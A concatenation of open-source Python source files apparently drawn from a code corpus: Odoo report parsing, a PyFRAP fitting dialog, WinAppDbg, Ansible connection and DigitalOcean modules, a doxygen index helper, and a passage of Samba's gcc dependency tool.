            return (deb, 'html')
        bin = self.get_lib(cursor, uid)
        pdf = self.generate_pdf(bin, report_xml, head, foot, htmls)
        return (pdf, 'pdf')

    def create(self, cursor, uid, ids, data, context=None):
        """We override the create function in order to handle generator
           Code taken from report openoffice. Thanks guys :)
        """
        pool = openerp.registry(cursor.dbname)
        ir_obj = pool['ir.actions.report.xml']
        report_xml_ids = ir_obj.search(cursor, uid,
                                       [('report_name', '=', self.name[7:])], context=context)
        if report_xml_ids:
            report_xml = ir_obj.browse(cursor, uid, report_xml_ids[0], context=context)
        else:
            return super(WebKitParser, self).create(cursor, uid, ids, data, context)
        if report_xml.report_type != 'webkit':
            return super(WebKitParser, self).create(cursor, uid, ids, data, context)
        result = self.create_source_pdf(cursor, uid, ids, data, report_xml, context)
        if not result:
            return (False,False)
        return result

    def _sanitize_html(self, html):
        """wkhtmltopdf expects the html page to declare a doctype.
        """
        if html and html[:9].upper() != "<!DOCTYPE":
            html = "<!DOCTYPE html>\n" + html
        return html

# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
alexblaessle/PyFRAP
pyfrp/gui/pyfrp_gui_fit_dialogs.py
2
15172
#===================================================================================================================================== #Copyright #===================================================================================================================================== #Copyright (C) 2014 Alexander Blaessle, Patrick Mueller and the Friedrich Miescher Laboratory of the Max Planck Society #This software is distributed under the terms of the GNU General Public License. #This file is part of PyFRAP. #PyFRAP is free software: you can redistribute it and/or modify #it under the terms of the GNU General Public License as published by #the Free Software Foundation, either version 3 of the License, or #(at your option) any later version. #This program is distributed in the hope that it will be useful, #but WITHOUT ANY WARRANTY; without even the implied warranty of #MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #GNU General Public License for more details. #You should have received a copy of the GNU General Public License #along with this program. If not, see <http://www.gnu.org/licenses/>. 
#===========================================================================================================================================================================
#Module Description
#===========================================================================================================================================================================
#PyQT Dialogs for fit class
#(1)

#===========================================================================================================================================================================
#Importing necessary modules
#===========================================================================================================================================================================

#QT
from PyQt4 import QtGui, QtCore

#PyFRAP GUI classes
import pyfrp_gui_basics

#PyFRAP modules
from pyfrp.modules.pyfrp_term_module import *
from pyfrp.modules import pyfrp_img_module
from pyfrp.modules import pyfrp_misc_module

#Numpy/Scipy
import numpy as np

#Misc
import os

#===================================================================================================================================
#Dialog for editing simulation settings
#===================================================================================================================================

class fitSettingsDialog(pyfrp_gui_basics.basicSettingsDialog):

    """Settings dialog for a PyFRAP fit object: exposes the optimizer,
    initial guess, bounds, fitted ROIs and fit options of ``fit``.
    Changes are written straight back to ``fit`` via its setters.
    """

    def __init__(self,fit,parent):
        super(fitSettingsDialog,self).__init__(parent)

        # The fit object being edited (modified in place by the callbacks below).
        self.fit = fit

        #Labels
        self.lblName = QtGui.QLabel("Name:", self)
        self.lblOptMeth = QtGui.QLabel("Optimization Method:", self)
        self.lblMaxFun = QtGui.QLabel("Max. Function Calls:", self)
        self.lblOptTol = QtGui.QLabel("Precision goal:", self)
        self.lblX0D = QtGui.QLabel("x0(D):", self)
        self.lblX0Prod = QtGui.QLabel("x0(production):", self)
        self.lblX0Degr = QtGui.QLabel("x0(degration):", self)
        self.lblBoundsD = QtGui.QLabel("<= D <=", self)
        self.lblBoundsProd = QtGui.QLabel("<= production <=", self)
        self.lblBoundsDegr = QtGui.QLabel("<= degration <=", self)
        self.lblKinetic = QtGui.QLabel("Kinetic Timescale:", self)
        self.lblSaveTrack = QtGui.QLabel("Save Track:", self)
        self.lblEquOn = QtGui.QLabel("Equalization:", self)
        self.lblFitPinned = QtGui.QLabel("Fit Pinned:", self)
        self.lblFitProd = QtGui.QLabel("Fit Production:", self)
        self.lblFitDegr = QtGui.QLabel("Fit Degradation:", self)
        self.lblFitCutOffT = QtGui.QLabel("Fit Cut-Off:", self)
        self.lblCutOffT = QtGui.QLabel("t(Cut-Off):", self)

        # Section headers get a bold font.
        boldfont = QtGui.QFont()
        boldfont.setBold(True)

        self.lblHeadBounds = QtGui.QLabel("Bounds:", self)
        self.lblHeadBounds.setFont(boldfont)
        self.lblHeadX0 = QtGui.QLabel("Initial Guess:", self)
        self.lblHeadX0.setFont(boldfont)
        self.lblHeadGeneral = QtGui.QLabel("General:", self)
        self.lblHeadGeneral.setFont(boldfont)
        self.lblHeadROI = QtGui.QLabel("ROIs Fitted:", self)
        self.lblHeadROI.setFont(boldfont)
        self.lblHeadOptions = QtGui.QLabel("Fit Options:", self)
        self.lblHeadOptions.setFont(boldfont)

        #LineEdits
        # Pre-filled from the current fit attributes; x0 is [D, production, degradation].
        self.qleName = QtGui.QLineEdit(self.fit.name)
        self.qleMaxFun = QtGui.QLineEdit(str(self.fit.maxfun))
        self.qleOptTol = QtGui.QLineEdit(str(self.fit.optTol))
        self.qleX0D = QtGui.QLineEdit(str(self.fit.x0[0]))
        self.qleX0Prod = QtGui.QLineEdit(str(self.fit.x0[1]))
        self.qleX0Degr = QtGui.QLineEdit(str(self.fit.x0[2]))
        self.qleLBD = QtGui.QLineEdit(str(self.fit.LBD))
        self.qleLBProd = QtGui.QLineEdit(str(self.fit.LBProd))
        self.qleLBDegr = QtGui.QLineEdit(str(self.fit.LBDegr))
        self.qleUBD = QtGui.QLineEdit(str(self.fit.UBD))
        self.qleUBProd = QtGui.QLineEdit(str(self.fit.UBProd))
        self.qleUBDegr = QtGui.QLineEdit(str(self.fit.UBDegr))
        self.qleKinetic = QtGui.QLineEdit(str(self.fit.kineticTimeScale))
        self.qleCutOffT = QtGui.QLineEdit(str(self.fit.cutOffT))

        self.doubleValid=QtGui.QDoubleValidator()
        self.intValid=QtGui.QIntValidator()

        self.qleX0D.setValidator(self.doubleValid)
        self.qleX0Prod.setValidator(self.doubleValid)
        self.qleX0Degr.setValidator(self.doubleValid)
        self.qleKinetic.setValidator(self.intValid)
        self.qleCutOffT.setValidator(self.doubleValid)

        self.qleName.editingFinished.connect(self.setName)
        self.qleMaxFun.editingFinished.connect(self.setMaxfun)
        self.qleOptTol.editingFinished.connect(self.setOptTol)
        self.qleKinetic.editingFinished.connect(self.setKineticTimeScale)
        self.qleLBProd.editingFinished.connect(self.setLBProd)
        self.qleLBDegr.editingFinished.connect(self.setLBDegr)
        self.qleLBD.editingFinished.connect(self.setLBD)
        self.qleUBProd.editingFinished.connect(self.setUBProd)
        self.qleUBDegr.editingFinished.connect(self.setUBDegr)
        self.qleUBD.editingFinished.connect(self.setUBD)
        self.qleX0Prod.editingFinished.connect(self.setX0Prod)
        self.qleX0Degr.editingFinished.connect(self.setX0Degr)
        self.qleX0D.editingFinished.connect(self.setX0D)
        self.qleCutOffT.editingFinished.connect(self.setCutOffT)

        #ComboBox
        self.comboMeth = QtGui.QComboBox(self)
        self.comboMeth.addItem("Constrained Nelder-Mead")
        self.comboMeth.addItem("TNC")
        self.comboMeth.addItem("Nelder-Mead")
        self.comboMeth.addItem("L-BFGS-B")
        self.comboMeth.addItem("SLSQP")
        self.comboMeth.addItem("brute")
        self.comboMeth.addItem("BFGS")
        self.comboMeth.addItem("CG")

        self.initComboMeth()

        self.comboMeth.activated[str].connect(self.setOptMeth)

        #Checkboxes
        self.cbFitProd = QtGui.QCheckBox('', self)
        self.cbFitDegr = QtGui.QCheckBox('', self)
        self.cbFitPinned = QtGui.QCheckBox('', self)
        self.cbEquOn = QtGui.QCheckBox('', self)
        self.cbFitCutOffT = QtGui.QCheckBox('', self)
        self.cbSaveTrack = QtGui.QCheckBox('', self)

        self.updateCBs()

        self.connect(self.cbFitProd, QtCore.SIGNAL('stateChanged(int)'), self.checkFitProd)
        self.connect(self.cbFitDegr, QtCore.SIGNAL('stateChanged(int)'), self.checkFitDegr)
        self.connect(self.cbFitPinned, QtCore.SIGNAL('stateChanged(int)'), self.checkFitPinned)
        self.connect(self.cbFitCutOffT, QtCore.SIGNAL('stateChanged(int)'), self.checkFitCutOffT)
        self.connect(self.cbEquOn, QtCore.SIGNAL('stateChanged(int)'), self.checkEquOn)
        self.connect(self.cbSaveTrack, QtCore.SIGNAL('stateChanged(int)'), self.checkSaveTrack)

        #TreeWigget
        self.ROIList=QtGui.QTreeWidget()
        self.ROIList.setHeaderLabels(["Name"])
        self.ROIList.setColumnWidth(0,100)
        self.updateROIList()

        #Buttons
        self.btnAddROI=QtGui.QPushButton('Add')
        # NOTE(review): connect is called on btnDone instead of btnAddROI; with
        # old-style PyQt4 connect the owning object is irrelevant, so this still
        # wires btnAddROI.clicked -> addROI, but it is inconsistent with the
        # btnRemoveROI line below — confirm before "fixing".
        self.btnDone.connect(self.btnAddROI, QtCore.SIGNAL('clicked()'), self.addROI)
        self.btnRemoveROI=QtGui.QPushButton('Remove')
        self.btnRemoveROI.connect(self.btnRemoveROI, QtCore.SIGNAL('clicked()'), self.removeROI)

        #Layout
        self.grid.addWidget(self.lblHeadGeneral,0,1,1,2,QtCore.Qt.AlignHCenter)
        self.grid.addWidget(self.lblName,1,1)
        self.grid.addWidget(self.lblOptMeth,2,1)
        self.grid.addWidget(self.lblMaxFun,3,1)
        self.grid.addWidget(self.lblOptTol,4,1)
        self.grid.addWidget(self.lblKinetic,5,1)
        self.grid.addWidget(self.lblSaveTrack,6,1)
        self.grid.addWidget(self.qleName,1,2)
        self.grid.addWidget(self.comboMeth,2,2)
        self.grid.addWidget(self.qleMaxFun,3,2)
        self.grid.addWidget(self.qleOptTol,4,2)
        self.grid.addWidget(self.qleKinetic,5,2)
        self.grid.addWidget(self.cbSaveTrack,6,2)
        self.grid.addWidget(self.lblHeadX0,8,1,1,2,QtCore.Qt.AlignHCenter)
        self.grid.addWidget(self.lblX0D,9,1)
        self.grid.addWidget(self.lblX0Prod,10,1)
        self.grid.addWidget(self.lblX0Degr,11,1)
        self.grid.addWidget(self.qleX0D,9,2)
        self.grid.addWidget(self.qleX0Prod,10,2)
        self.grid.addWidget(self.qleX0Degr,11,2)
        self.grid.addWidget(self.lblHeadBounds,0,3,1,3,QtCore.Qt.AlignHCenter)
        self.grid.addWidget(self.qleLBD,1,3)
        self.grid.addWidget(self.qleLBProd,2,3)
        self.grid.addWidget(self.qleLBDegr,3,3)
        self.grid.addWidget(self.lblBoundsD,1,4,QtCore.Qt.AlignHCenter)
        self.grid.addWidget(self.lblBoundsProd,2,4,QtCore.Qt.AlignHCenter)
        self.grid.addWidget(self.lblBoundsDegr,3,4,QtCore.Qt.AlignHCenter)
        self.grid.addWidget(self.qleUBD,1,5)
        self.grid.addWidget(self.qleUBProd,2,5)
        self.grid.addWidget(self.qleUBDegr,3,5)
        self.grid.addWidget(self.lblHeadROI,5,3,1,3,QtCore.Qt.AlignHCenter)
        self.grid.addWidget(self.ROIList,6,3,5,3)
        self.grid.addWidget(self.btnAddROI,11,3)
        self.grid.addWidget(self.btnRemoveROI,11,5)
        self.grid.addWidget(self.lblHeadOptions,0,6,1,2,QtCore.Qt.AlignHCenter)
        self.grid.addWidget(self.lblEquOn,1,6)
        self.grid.addWidget(self.lblFitPinned,2,6)
        self.grid.addWidget(self.lblFitProd,3,6)
        self.grid.addWidget(self.lblFitDegr,4,6)
        self.grid.addWidget(self.lblFitCutOffT,5,6)
        self.grid.addWidget(self.lblCutOffT,6,6)
        self.grid.addWidget(self.cbEquOn,1,7)
        self.grid.addWidget(self.cbFitPinned,2,7)
        self.grid.addWidget(self.cbFitProd,3,7)
        self.grid.addWidget(self.cbFitDegr,4,7)
        self.grid.addWidget(self.cbFitCutOffT,5,7)
        self.grid.addWidget(self.qleCutOffT,6,7)

        self.resize(900,700)
        self.setWindowTitle("Fit Settings")
        self.show()

    def validateBound(self,b):
        """Return True if b is empty/None or parses as a float; print an error otherwise."""
        if b==None or b=="":
            return True
        try:
            c=float(b)
            return True
        except:
            printError("Invalid boundary entered.")
            return False

    def updateROIList(self):
        """Rebuild the ROI tree widget from fit.ROIsFitted."""
        self.ROIList.clear()
        for r in self.fit.ROIsFitted:
            QtGui.QTreeWidgetItem(self.ROIList,[r.name])
        return self.ROIList

    def initComboMeth(self):
        """Select the combo entry matching the fit's current optimizer."""
        idx=self.comboMeth.findText(self.fit.optMeth,QtCore.Qt.MatchExactly)
        self.comboMeth.setCurrentIndex(idx)

    def updateCBs(self):
        """Sync all checkboxes with the fit's flags (2 == Qt.Checked)."""
        self.cbEquOn.setCheckState(2*int(self.fit.equOn))
        self.cbFitPinned.setCheckState(2*int(self.fit.fitPinned))
        self.cbFitProd.setCheckState(2*int(self.fit.fitProd))
        self.cbFitDegr.setCheckState(2*int(self.fit.fitDegr))
        self.cbFitCutOffT.setCheckState(2*int(self.fit.fitCutOffT))
        self.cbSaveTrack.setCheckState(2*int(self.fit.saveTrack))

    # Checkbox callbacks: val is the Qt check state (0 unchecked / 2 checked),
    # bool(2*val) maps it to False/True.
    def checkEquOn(self,val):
        self.fit.setEqu(bool(2*val))

    def checkFitPinned(self,val):
        self.fit.setFitPinned(bool(2*val))

    def checkFitProd(self,val):
        self.fit.setFitProd(bool(2*val))

    def checkFitDegr(self,val):
        self.fit.setFitDegr(bool(2*val))

    def checkFitCutOffT(self,val):
        self.fit.setFitCutOffT(bool(2*val))

    def checkSaveTrack(self,val):
        self.fit.setSaveTrack(bool(2*val))

    # Bound setters: empty string or 'None' means "no bound" (None);
    # otherwise the value is validated and stored as float.
    def setLBD(self):
        text=str(self.qleLBD.text())
        if text=="" or text=='None':
            text=None
            self.fit.setLBD(text)
        else:
            if self.validateBound(text):
                self.fit.setLBD(float(text))

    def setLBProd(self):
        text=str(self.qleLBProd.text())
        if text=="" or text=='None':
            text=None
            self.fit.setLBProd(text)
        else:
            if self.validateBound(text):
                self.fit.setLBProd(float(text))

    def setLBDegr(self):
        text=str(self.qleLBDegr.text())
        if text=="" or text=='None':
            text=None
            self.fit.setLBDegr(text)
        else:
            if self.validateBound(text):
                self.fit.setLBDegr(float(text))

    def setUBD(self):
        text=str(self.qleUBD.text())
        if text=="" or text=='None':
            text=None
            self.fit.setUBD(text)
        else:
            if self.validateBound(text):
                self.fit.setUBD(float(text))

    def setUBProd(self):
        text=str(self.qleUBProd.text())
        if text=="" or text=='None':
            text=None
            self.fit.setUBProd(text)
        else:
            if self.validateBound(text):
                self.fit.setUBProd(float(text))

    def setUBDegr(self):
        text=str(self.qleUBDegr.text())
        if text=="" or text=='None':
            text=None
            self.fit.setUBDegr(text)
        else:
            if self.validateBound(text):
                self.fit.setUBDegr(float(text))

    # Initial-guess setters: an empty field is rejected with a warning.
    def setX0D(self):
        text=str(self.qleX0D.text())
        if text=="":
            printWarning("You must give a value for x0.")
            return
        self.fit.setX0D(float(text))

    def setX0Prod(self):
        text=str(self.qleX0Prod.text())
        if text=="":
            printWarning("You must give a value for x0.")
            return
        self.fit.setX0Prod(float(text))

    def setX0Degr(self):
        text=str(self.qleX0Degr.text())
        if text=="":
            printWarning("You must give a value for x0.")
            return
        self.fit.setX0Degr(float(text))

    def setName(self):
        self.fit.setName(str(self.qleName.text()))

    def setOptMeth(self):
        self.fit.setOptMeth(str(self.comboMeth.currentText()))

    def setKineticTimeScale(self):
        self.fit.setKineticTimeScale(float(str(self.qleKinetic.text())))

    def setMaxfun(self):
        self.fit.setMaxfun(int(str(self.qleMaxFun.text())))

    def setOptTol(self):
        self.fit.setOptTol(float(str(self.qleOptTol.text())))

    def setCutOffT(self):
        self.fit.setCutOffT(float(str(self.qleCutOffT.text())))

    def addROI(self):
        """Let the user pick an embryo ROI and add it to fit.ROIsFitted."""
        nameList=pyfrp_misc_module.objAttrToList(self.fit.embryo.ROIs,'name')
        selectorDialog = pyfrp_gui_basics.basicSelectorDialog(nameList,self)
        if selectorDialog.exec_():
            selectedROIName = selectorDialog.getItem()
            if selectedROIName==None:
                return
            selectedROI=self.fit.embryo.ROIs[nameList.index(selectedROIName)]
            if selectedROI not in self.fit.ROIsFitted:
                self.fit.addROI(selectedROI)
            self.updateROIList()

    def removeROI(self):
        """Remove the currently selected ROI from fit.ROIsFitted."""
        idx=self.ROIList.indexFromItem(self.ROIList.currentItem()).row()
        self.fit.removeROI(self.fit.ROIsFitted[idx])
        self.updateROIList()

#===================================================================================================================================
#Dialogs for fitting progress
#===================================================================================================================================

class fittingProgressDialog(pyfrp_gui_basics.waitDialog):

    """Simple modal "fitting in progress" wait dialog."""

    def __init__(self,parent):
        super(fittingProgressDialog,self).__init__(parent)

        #Labels
        self.lblName.setText("Fitting in progress...")

        #Window title
        self.setWindowTitle('Fitting progress')

        self.show()

class fittingThread(pyfrp_gui_basics.pyfrpThread):

    """Background thread running fit.run() so the GUI stays responsive."""

    def __init__(self, fit=None, parent=None):
        super(fittingThread,self).__init__(parent)
        self.obj=fit
        self.fit=fit

    def runTask(self,debug=False):
        self.fit.run(debug=debug)
gpl-3.0
goodwinnk/intellij-community
python/helpers/pydev/pydevd_attach_to_process/winappdbg/plugins/__init__.py
102
1755
#!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright (c) 2009-2014, Mario Vilas # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice,this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # * Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. """ Plugins folder for the WinAppDbg interactive debugger. """ __revision__ = "$Id: __init__.py 1125 2012-10-22 14:54:39Z qvasimodo $"
apache-2.0
vmindru/ansible
lib/ansible/plugins/connection/libvirt_lxc.py
47
7419
# Based on local.py (c) 2012, Michael DeHaan <michael.dehaan@gmail.com> # Based on chroot.py (c) 2013, Maykel Moya <mmoya@speedyrails.com> # (c) 2013, Michael Scherer <misc@zarb.org> # (c) 2015, Toshio Kuratomi <tkuratomi@ansible.com> # (c) 2017 Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import (absolute_import, division, print_function) __metaclass__ = type DOCUMENTATION = """ author: Michael Scherer <misc@zarb.org> connection: libvirt_lxc short_description: Run tasks in lxc containers via libvirt description: - Run commands or put/fetch files to an existing lxc container using libvirt version_added: "2.0" options: remote_addr: description: - Container identifier default: The set user as per docker's configuration vars: - name: ansible_host - name: ansible_libvirt_lxc_host """ import distutils.spawn import os import os.path import subprocess import traceback from ansible import constants as C from ansible.errors import AnsibleError from ansible.module_utils.six.moves import shlex_quote from ansible.module_utils._text import to_bytes from ansible.plugins.connection import ConnectionBase, BUFSIZE from ansible.utils.display import Display display = Display() class Connection(ConnectionBase): ''' Local lxc based connections ''' transport = 'libvirt_lxc' has_pipelining = True # su currently has an undiagnosed issue with calculating the file # checksums (so copy, for instance, doesn't work right) # Have to look into that before re-enabling this default_user = 'root' has_tty = False def __init__(self, play_context, new_stdin, *args, **kwargs): super(Connection, self).__init__(play_context, new_stdin, *args, **kwargs) self.lxc = self._play_context.remote_addr self.virsh = self._search_executable('virsh') self._check_domain(self.lxc) def _search_executable(self, executable): cmd = distutils.spawn.find_executable(executable) if not cmd: raise AnsibleError("%s command not found in PATH") % 
executable return cmd def _check_domain(self, domain): p = subprocess.Popen([self.virsh, '-q', '-c', 'lxc:///', 'dominfo', to_bytes(domain)], stdout=subprocess.PIPE, stderr=subprocess.PIPE) p.communicate() if p.returncode: raise AnsibleError("%s is not a lxc defined in libvirt" % domain) def _connect(self): ''' connect to the lxc; nothing to do here ''' super(Connection, self)._connect() if not self._connected: display.vvv("THIS IS A LOCAL LXC DIR", host=self.lxc) self._connected = True def _buffered_exec_command(self, cmd, stdin=subprocess.PIPE): ''' run a command on the chroot. This is only needed for implementing put_file() get_file() so that we don't have to read the whole file into memory. compared to exec_command() it looses some niceties like being able to return the process's exit code immediately. ''' executable = C.DEFAULT_EXECUTABLE.split()[0] if C.DEFAULT_EXECUTABLE else '/bin/sh' local_cmd = [self.virsh, '-q', '-c', 'lxc:///', 'lxc-enter-namespace'] if C.DEFAULT_LIBVIRT_LXC_NOSECLABEL: local_cmd += ['--noseclabel'] local_cmd += [self.lxc, '--', executable, '-c', cmd] display.vvv("EXEC %s" % (local_cmd,), host=self.lxc) local_cmd = [to_bytes(i, errors='surrogate_or_strict') for i in local_cmd] p = subprocess.Popen(local_cmd, shell=False, stdin=stdin, stdout=subprocess.PIPE, stderr=subprocess.PIPE) return p def exec_command(self, cmd, in_data=None, sudoable=False): ''' run a command on the chroot ''' super(Connection, self).exec_command(cmd, in_data=in_data, sudoable=sudoable) p = self._buffered_exec_command(cmd) stdout, stderr = p.communicate(in_data) return (p.returncode, stdout, stderr) def _prefix_login_path(self, remote_path): ''' Make sure that we put files into a standard path If a path is relative, then we need to choose where to put it. ssh chooses $HOME but we aren't guaranteed that a home dir will exist in any given chroot. So for now we're choosing "/" instead. This also happens to be the former default. 
Can revisit using $HOME instead if it's a problem ''' if not remote_path.startswith(os.path.sep): remote_path = os.path.join(os.path.sep, remote_path) return os.path.normpath(remote_path) def put_file(self, in_path, out_path): ''' transfer a file from local to lxc ''' super(Connection, self).put_file(in_path, out_path) display.vvv("PUT %s TO %s" % (in_path, out_path), host=self.lxc) out_path = shlex_quote(self._prefix_login_path(out_path)) try: with open(to_bytes(in_path, errors='surrogate_or_strict'), 'rb') as in_file: if not os.fstat(in_file.fileno()).st_size: count = ' count=0' else: count = '' try: p = self._buffered_exec_command('dd of=%s bs=%s%s' % (out_path, BUFSIZE, count), stdin=in_file) except OSError: raise AnsibleError("chroot connection requires dd command in the chroot") try: stdout, stderr = p.communicate() except Exception: traceback.print_exc() raise AnsibleError("failed to transfer file %s to %s" % (in_path, out_path)) if p.returncode != 0: raise AnsibleError("failed to transfer file %s to %s:\n%s\n%s" % (in_path, out_path, stdout, stderr)) except IOError: raise AnsibleError("file or module does not exist at: %s" % in_path) def fetch_file(self, in_path, out_path): ''' fetch a file from lxc to local ''' super(Connection, self).fetch_file(in_path, out_path) display.vvv("FETCH %s TO %s" % (in_path, out_path), host=self.lxc) in_path = shlex_quote(self._prefix_login_path(in_path)) try: p = self._buffered_exec_command('dd if=%s bs=%s' % (in_path, BUFSIZE)) except OSError: raise AnsibleError("chroot connection requires dd command in the chroot") with open(to_bytes(out_path, errors='surrogate_or_strict'), 'wb+') as out_file: try: chunk = p.stdout.read(BUFSIZE) while chunk: out_file.write(chunk) chunk = p.stdout.read(BUFSIZE) except Exception: traceback.print_exc() raise AnsibleError("failed to transfer file %s to %s" % (in_path, out_path)) stdout, stderr = p.communicate() if p.returncode != 0: raise AnsibleError("failed to transfer file %s to %s:\n%s\n%s" 
% (in_path, out_path, stdout, stderr)) def close(self): ''' terminate the connection; nothing to do here ''' super(Connection, self).close() self._connected = False
gpl-3.0
awkspace/ansible
lib/ansible/modules/cloud/digital_ocean/digital_ocean_tag_facts.py
29
2926
#!/usr/bin/python # -*- coding: utf-8 -*- # Copyright: (c) 2018, Ansible Project # Copyright: (c) 2018, Abhijeet Kasurde <akasurde@redhat.com> # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = { 'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community' } DOCUMENTATION = ''' --- module: digital_ocean_tag_facts short_description: Gather facts about DigitalOcean tags description: - This module can be used to gather facts about DigitalOcean provided tags. author: "Abhijeet Kasurde (@Akasurde)" version_added: "2.6" options: tag_name: description: - Tag name that can be used to identify and reference a tag. required: false requirements: - "python >= 2.6" extends_documentation_fragment: digital_ocean.documentation ''' EXAMPLES = ''' - name: Gather facts about all tags digital_ocean_tag_facts: oauth_token: "{{ oauth_token }}" - name: Gather facts about tag with given name digital_ocean_tag_facts: oauth_token: "{{ oauth_token }}" tag_name: "extra_awesome_tag" - name: Get resources from tag name digital_ocean_tag_facts: register: resp_out - set_fact: resources: "{{ item.resources }}" loop: "{{ resp_out.data|json_query(name) }}" vars: name: "[?name=='extra_awesome_tag']" - debug: var=resources ''' RETURN = ''' data: description: DigitalOcean tag facts returned: success type: list sample: [ { "name": "extra-awesome", "resources": { "droplets": { "count": 1, ... } } }, ] ''' from traceback import format_exc from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.digital_ocean import DigitalOceanHelper from ansible.module_utils._text import to_native def core(module): tag_name = module.params.get('tag_name', None) rest = DigitalOceanHelper(module) base_url = 'tags?' 
if tag_name is not None: response = rest.get("%s/%s" % (base_url, tag_name)) status_code = response.status_code if status_code != 200: module.fail_json(msg="Failed to retrieve tags for DigitalOcean") resp_json = response.json tag = resp_json['tag'] else: tag = rest.get_paginated_data(base_url=base_url, data_key_name='tags') module.exit_json(changed=False, data=tag) def main(): argument_spec = DigitalOceanHelper.digital_ocean_argument_spec() argument_spec.update( tag_name=dict(type='str', required=False), ) module = AnsibleModule(argument_spec=argument_spec) try: core(module) except Exception as e: module.fail_json(msg=to_native(e), exception=format_exc()) if __name__ == '__main__': main()
gpl-3.0
rupumped/Gen2-UHF-RFID-Reader
gr-rfid/docs/doxygen/doxyxml/generated/index.py
344
1871
#!/usr/bin/env python
"""
Thin subclasses over the generateDS.py-produced ``indexsuper`` bindings
(originally generated Mon Feb 9 19:08:05 2009) that add search helpers for
Doxygen index data.
"""

from xml.dom import minidom
import os
import sys
import compound

import indexsuper as supermod


class DoxygenTypeSub(supermod.DoxygenType):
    """Root index node with compound/member search support."""

    def __init__(self, version=None, compound=None):
        supermod.DoxygenType.__init__(self, version, compound)

    def find_compounds_and_members(self, details):
        """
        Returns a list of all compounds and their members which match details
        """
        matched = []
        # NOTE: loop variable renamed from the original 'compound' to avoid
        # shadowing the imported 'compound' module.
        for cpd in self.compound:
            member_hits = cpd.find_members(details)
            if member_hits:
                matched.append([cpd, member_hits])
            elif details.match(cpd):
                # The compound itself matches even though no member does.
                matched.append([cpd, []])
        return matched

supermod.DoxygenType.subclass = DoxygenTypeSub
# end class DoxygenTypeSub


class CompoundTypeSub(supermod.CompoundType):
    """A single compound (class/file/namespace) entry in the index."""

    def __init__(self, kind=None, refid=None, name='', member=None):
        supermod.CompoundType.__init__(self, kind, refid, name, member)

    def find_members(self, details):
        """
        Returns a list of all members which match details
        """
        return [entry for entry in self.member if details.match(entry)]

supermod.CompoundType.subclass = CompoundTypeSub
# end class CompoundTypeSub


class MemberTypeSub(supermod.MemberType):
    """A single member (function/variable/...) entry within a compound."""

    def __init__(self, kind=None, refid=None, name=''):
        supermod.MemberType.__init__(self, kind, refid, name)

supermod.MemberType.subclass = MemberTypeSub
# end class MemberTypeSub


def parse(inFilename):
    """Parse a Doxygen index XML file and return the built root object."""
    document = minidom.parse(inFilename)
    root_obj = supermod.DoxygenType.factory()
    root_obj.build(document.documentElement)
    return root_obj
gpl-3.0
obnoxxx/samba
buildtools/wafsamba/gccdeps.py
33
3350
# encoding: utf-8
# Thomas Nagy, 2008-2010 (ita)

"""
Execute the tasks with gcc -MD, read the dependencies from the .d file
and prepare the dependency calculation for the next run
"""

import os, re, threading
import Task, Logs, Utils, preproc
from TaskGen import before, after, feature

# Serializes Node lookups from post_run(), which runs on worker threads.
lock = threading.Lock()

preprocessor_flag = '-MD'


@feature('cc')
@before('apply_core')
def add_mmd_cc(self):
    """Inject -MD into CCFLAGS (once) so gcc emits .d dependency files."""
    if self.env.get_flat('CCFLAGS').find(preprocessor_flag) < 0:
        self.env.append_value('CCFLAGS', preprocessor_flag)


@feature('cxx')
@before('apply_core')
def add_mmd_cxx(self):
    """Inject -MD into CXXFLAGS (once) so g++ emits .d dependency files."""
    if self.env.get_flat('CXXFLAGS').find(preprocessor_flag) < 0:
        self.env.append_value('CXXFLAGS', preprocessor_flag)


def scan(self):
    "the scanner does not do anything initially"
    # Dependencies come from the previous run's .d files (see post_run),
    # not from a preprocessor pass of our own.
    nodes = self.generator.bld.node_deps.get(self.unique_id(), [])
    names = []
    return (nodes, names)


# FIX: use raw strings — the originals ("\.o$", "^(\.\.)[\\/](.*)$") relied on
# invalid escape sequences, which newer Python versions warn about or reject.
re_o = re.compile(r"\.o$")
re_src = re.compile(r"^(\.\.)[\\/](.*)$")


def post_run(self):
    """Parse the gcc-generated .d file and store real dependencies for the next run.

    The following code is executed by threads, it is not safe, so a lock is
    needed around every Node lookup.
    """
    if getattr(self, 'cached', None):
        return Task.Task.post_run(self)

    name = self.outputs[0].abspath(self.env)
    name = re_o.sub('.d', name)
    txt = Utils.readf(name)
    #os.unlink(name)

    # Undo line continuations, then strip the "target:" prefix; what remains
    # is a whitespace-separated list of dependency paths.
    txt = txt.replace('\\\n', '')
    lst = txt.strip().split(':')
    val = ":".join(lst[1:])
    val = val.split()

    nodes = []
    bld = self.generator.bld
